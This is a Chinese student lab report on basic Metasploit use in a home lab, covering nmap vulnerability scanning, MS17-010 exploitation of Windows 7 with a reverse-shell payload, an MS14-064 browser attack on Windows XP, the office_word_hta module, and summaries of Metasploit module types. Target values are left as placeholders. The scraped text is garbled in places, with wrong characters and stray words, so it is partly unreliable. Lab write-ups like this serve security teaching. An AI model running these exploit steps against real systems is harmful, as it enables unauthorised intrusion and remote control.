Exp5 MSF基础应用

 

环境

 

  1. 主机:kali

    靶机:windows 七、win十、windows xp SP3 english、python

namp扫描

(https://blog.csdn.net/qq_29277155/article/details/50977143) 此博客有较多阐述算法

0x01 nmap 的介绍

     Nmap是一个网络链接端扫描软件,用来扫描网上电脑开放的网络链接端。肯定哪些服务运行在哪些链接端,而且推断计算机运行哪一个操做系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。shell

      在长达3.5年以后,Fyodor终于发布了著名开源网络检索工具的最新版本Nmap7。Nmap是最受欢迎的开源网络映射器之一此外,Nmap7这款自动化的扫描器可以轻易检测到Heartbleed、POODLE、FREAK等严重漏洞。Nmap7中对ssl-enum-ciphers(SSL枚举密码)脚本替换了新的实现算法,使得它可以经过枚举SSL/TLS协议版本和密码套件来快速分析TLS链接,它还可以迅速识别部署问题。另外,使用Nmap7可以轻易发现包含漏洞的服务器,Nmap7中包含了对提速和扫描实现的改进。这个工具的新版本包括一个更新、更快的Nmap脚本引擎(Nmap Scripting Engine,NSE),同时它还容许用户编写Lua脚本。windows

0x02 使用nmap 检测多种漏洞     对win7 操做

      使用namp 对这些被扫描工具扫描出来的漏洞进行人工手动验证,这些仅是命令,至于如何根据出现的结果进行判断是否有漏洞,这个在结果中很容易看出,例如出现 vulnerable-有漏洞; not vulnerable-无漏洞。  有结果出来-有漏洞;无结果出来-无漏洞,日后在其余测试中,只须要将scanme.nmap.org 替换成带验证的目标IP 或者网站。浏览器

nmap --script=vuln xxxx

  挖出了一个ms17_010漏洞安全

输入: msfdb run 打开了msfconle

 

search ms17_010

注意第三个选项,这是我本身在exploit database 上下载下来的,而后导入到msf中的,但是没想到也是基于ms17-010的,ruby

在本次实验中我尝试了第3、4、五个来对win7进行攻击,效果很好,都成功了服务器

首先选择的是本身从exploit database 上导入的  439(名字瞎编的) 网络

输入show options 后观察须要设置的参数
set payload  generic/shell_reverse_tcp
set LHOST xxx
set  smbuser xxx
set  smbpass xxx

  虽然结果成功了,可是这依然须要用户名与密码,我以为这样其实也不怎么厉害session

接下来选择用   windows/smb/ms17_010_psexec 与上面差很少

 

 

针对浏览器攻击

因为对与上一步win7攻击的成功,因而我用来攻击IE

2015年3月微软确认将放弃IE品牌。转而在windows 10上,Microsoft Edge取代了,因此IE最终版是IE11(win10)

首先我预想的是攻击win10,因此找了一个很新的漏洞,然而,大神是用python写的。而想要导入msf中只能用.rb的文件,凉凉

因此,我以为黑客的知识面应该是至关普遍的,广而深的

在msf自带的漏洞库里也有针对IE11的

然而攻击效果是这样的,什么反应也没有

 

 

而后不甘心的退而求其次,转攻win7的IE7     

 

而后我谷歌了一下。。。。。。。没有解决。待定。。。。

后来上网搜了一下,知道了msf自动化测试,我以为能够试一试

search autopwn

 而后选择、设置,但是还出现了问题,永远不知道下一步的探索

只好去测试xp

选择了

use winndows/browser/ms14_064_ole_code_execution

  

set SRVHOST xxx    
set payload xxx       
set LHOST xxx         
exploit

而后在xp系统中打开ie,输入url访问,

 

成功的拿到了session ,测试成功

利用office_word_hta模块攻击win7

这个评价是excellent想必是不错的啦

这个依然同上,使用show options 查看设置参数就ok

在靶机上访问URL运行一下文件就OK

 

 

后经同窗指点知道一个链接网络的方法:  将靶机与攻击机都设置为桥接模式,而后用手机开个热点,但不开流量,这样的话就至关与手机充当路由器的功能,并且不耗费流量,即可实现两台虚拟机的通讯,很赞。

 

  • Exploit模块
    • 是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而得到对远程目标系统访问权的代码组件。
    • 形象点来讲就是攻击模块
  • Payload模块
    • 是在渗透成功后促使目标系统运行的一端植入代码,一般做用是为渗透攻击者打开在目标系统上的控制会话链接。实际上,该模块就是计算机集成的针对不一样操做系统实现shellcode攻击的ruby代码。
  • Encoder模块
    • 针对payload进行编码,能够经过多种编码手段、屡次编码方式有效的改变payload代码特征
    • 不改变payload做用,但能对payload进行加工
  • Aux模块
    • 可以帮助渗透测试中在进行渗透攻击以前获得的目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
    • 主要包括针对各类网络服务的扫描和查点、构建虚假服务收集登陆密码、口令猜想破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。
  • Post模块
    • 支持在渗透攻击取得目标系统远程控制权以后,在受控系统中进行给各样的后渗透攻击动做。
    • 这里主要指的是攻击以后可能用到的模块
  • Nops模块
    • 是一些对程序运行状态不会形成任何实质影响的空操做或无关操做指令,最典型的空指令就是空操做,在X86 CPU体系架构平台上的操做码是0x90

由于有些代码返回地址很难确认,因此在实际中有时候会填充一大段空指令,便于快速肯定返回地址的位置

 实验体会:

路漫漫其修远兮,吾将上下而求索

相关文章
相关标签/搜索